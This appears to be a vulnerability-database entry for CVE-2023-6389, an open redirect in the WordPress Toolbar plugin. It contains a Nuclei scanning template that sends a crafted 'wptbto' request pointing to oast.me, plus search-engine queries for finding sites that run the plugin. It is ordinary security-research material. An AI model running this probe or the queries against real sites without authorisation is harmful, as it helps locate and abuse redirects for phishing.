CVE-2023-6389: WordPress Toolbar <= 2.2.6 - Open Redirect

日期: 2025-08-01 | 影响软件: WordPress Toolbar | POC: 已公开

漏洞描述

The plugin redirects to any URL via the "wptbto" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.

PoC代码[已公开]

id: CVE-2023-6389

info:
  name: WordPress Toolbar <= 2.2.6 - Open Redirect
  author: s4e-io
  severity: medium
  description: |
    The plugin redirects to any URL via the "wptbto" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
  reference:
    - https://wpscan.com/vulnerability/04dafc55-3a8d-4dd2-96da-7a8b100e5a81/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6389
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6389
    cwe-id: CWE-601
    epss-score: 0.52517
    epss-percentile: 0.9781
    cpe: cpe:2.3:a:abhinavsingh:wordpress_toolbar:*:*:*:*:*:*:wordpress:*
  metadata:
    verified: true
    max-request: 1
    vendor: abhinavsingh
    product: wordpress_toolbar
    shodan-query: http.html:/wp-content/plugins/wordpress-toolbar/
    fofa-query: body=/wp-content/plugins/wordpress-toolbar/
    publicwww-query: "/wp-content/plugins/wordpress-toolbar/"
  tags: wpscan,cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect,abhinavsingh,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wordpress-toolbar/toolbar.php?wptbto=https://oast.me&wptbhash=acme"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 490a0046304402205151a859f78181466d10beb67c59d11c83aee8da93f249777701bc5cdc0031560220055ea755c12a15da28f7d671be9b101b87ceb84c2f5b7e0bead31bffff915e76:922c64590222798bb761d5b6d8e72950

相关漏洞推荐